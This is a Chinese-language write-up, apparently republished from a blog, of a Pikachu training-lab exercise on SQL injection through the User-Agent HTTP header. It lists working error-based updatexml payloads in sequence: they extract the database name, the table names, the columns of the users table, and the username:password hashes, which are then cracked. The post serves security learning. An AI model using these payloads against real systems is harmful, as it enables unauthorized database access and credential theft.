piakchu-‘http header’注入

这篇具有很好参考价值的文章主要介绍了piakchu-‘http header’注入。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

http消息头是指,在超文本传输协议( Hypertext Transfer Protocol ,HTTP)的请求和响应消息中,协议头部分的那些组件。

http header 头信息可以获取客户端的一些信息,比如useragent、accept等字段,而且http消息头支持自定义。

首先打开pikachu靶机,我们先根据提示使用admin 123456 来登录,然后使用burpsuit进行抓包。

piakchu-‘http header’注入

piakchu-‘http header’注入

会发现,它可以知道我们的ip地址,以及使用什么浏览器访问,还有端口等信息。

所以大概可以判断是通过http header的头部来获取信息的,可以猜测是inser语句。

然后看下抓包内容。

piakchu-‘http header’注入

1、判断注入点及类型

将user-agent后面内容改成1和1'进行测试。

piakchu-‘http header’注入

piakchu-‘http header’注入

可知user-agent处存在注入点,闭合为'。

2、查询数据库名

使用以下语句注入  

1' update(0,concat(0x7b,database()),1) or '

piakchu-‘http header’注入

根据报错可知数据库名字为pikachu。

3、爆表名

使用以下语句注入

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31)),1) or '

piakchu-‘http header’注入 

因为上述并没显示完整,继续查询。

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31)),1) or '

piakchu-‘http header’注入 最后一个拼接的字段为xssblind。

4、爆users表的字段名

使用以下语句,同理每次按照31的字长截取。

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),1) or '

 piakchu-‘http header’注入

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31)),1) or '

 piakchu-‘http header’注入

最后这里省略了其他的类似步骤,经过不断报错查询,可知username和password的字段。

5、爆users表的内容

最后爆数据,同样改变substr里的值就行。

' or updatexml(0,concat(0x7b,substr((select group_concat(username,':',password) from users),1,31)),1) or '

 piakchu-‘http header’注入

用同样的方法将数据不断爆出,最后这是采用MD5加密的密码,所以通过工具解下就可以了。

 文章来源地址https://www.toymoban.com/news/detail-410486.html

到了这里,关于piakchu-‘http header’注入的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • piakchu-‘http header’注入

    http消息头 是指,在超文本传输协议( Hypertext Transfer Protocol ,HTTP)的请求和响应消息中,协议头部分的那些组件。 http header 头信息可以获取客户端的一些信息,比如useragent、accept等字段,而且http消息头支持自定义。 首先打开pikachu靶机, 我们先根据提示使用admin 123456 来登

    2023年04月11日
    浏览(27)
  • Http 超文本传输协议基本概念学习摘录

    目录 HTTP协议 超文本传输协议 HyperText超文本 HTML超文本标记语言 HTTP协议原理 请求发送 服务器处理 响应发送 连接关闭或保持 HTTP协议版本 HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/3 HTTP请求方法 GET POST PUT DELETE HEAD OPTIONS HTTP请求头字段 HTTP响应状态码 即超文本传输协议(HyperText Transfer

    2024年03月20日
    浏览(51)
  • 【Java网络编程】HTTP超文本传输协议

        HTTP 全称为 Hyper Text Transfer Protocol 超文本传输协议,它是基于 TCP 传输协议构建的应用层协议,作为支撑万维网 www 的核心协议,为了保证其效率及处理大量事务的能力,因此在设计时, HTTP 被制定成为一种无状态协议,也就是说: HTTP 本身不会对发送过的请求和相应的通

    2024年04月09日
    浏览(58)
  • 直播程式源码平台细讲HTTP协议:超文本传输

    HTTP协议的简介   HTTP协议是一种数据通信协议,是浏览器与服务器之间的协议,HTTP协议的中文全称为超文本传输协议,HTTP协议在直播程式源码平台中,承载着数据传输的重要任务,用户可以通过HTTP协议获取直播程式源码平台中提供给用户的信息与视频资源,并通过网络流传

    2024年02月10日
    浏览(44)
  • 【网络编程】一文详解http协议(超文本传输协议)

    需要云服务器等云产品来学习Linux的同学可以移步/--腾讯云--/--阿里云--/--华为云--/官网,轻量型云服务器低至112元/年,新用户首次下单享超低折扣。    目录 一、http协议 1、http协议的介绍 2、URL的组成 3、urlencode和urldecode 二、http的请求方法、状态码及状态码描述、常见的响

    2024年02月06日
    浏览(69)
  • 8.物联网LWIP,简要介绍http(超文本,URL),html(css,ajax),web实现打开灯

    一。HTTP详解 1.超文本:(HyperText) (1)超文本文件彼此链接,形成 网状 (web),内含有 超链接 (Link)与各种 媒体元素标记 (Markup)。 (2)超文本文件彼此 链接使用URL 表示。(下面解释URL) (3)常见超文本格式是 超文本标记 语言 HTML 。(下面解释HTML,代码) 综上

    2024年02月10日
    浏览(51)
  • HTML :深入了解超文本标记语言

    欢迎来到本篇博客,我将带你深入了解 HTML(超文本标记语言)。作为前端开发的基础,HTML是构建网页的重要工具。在这里,我们将涵盖 HTML 的全部内容,包括常用语句和标签。 HTML,全称HyperText Markup Language,是一种用于创建网页结构的标记语言。它由一系列的标签组成,标

    2024年02月16日
    浏览(40)
  • https是什么意思?(安全超文本传输协议)

    在逛论坛的时候发现有网友说到IE打不开HTTPS的情况,在论坛上的留言发现有部分网友说到还不知道什么是HTTPS?那么 HTTPS是什么意思? 所以yii666就在这里跟大家详细讲解HTTP的具体含义。内容如下: HTTP(hypertext transport protocol) HTTP相信大家有见到过,HTTP它所代表的就是超文

    2024年02月05日
    浏览(99)
  • HTTPS安全套接字层超文本传输协议

    HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付

    2024年02月15日
    浏览(54)
  • vite中配置 https 安全超文本网络协议

    前言: https 的配置是相对安全的,但是需要购买证书,它是 SSL/TLS + HTTP 的安全超文本网络协议 此版本配置的是在 vite 开发服务器上临时配置的 https 协议, 生产环境需要购买证书, 在nginx 中配置 在 vite 项目根目录中创建 mkcert 目录 全局安装 mkcert yarn add -g mkcert 利用 mkcert 创

    2024年02月04日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包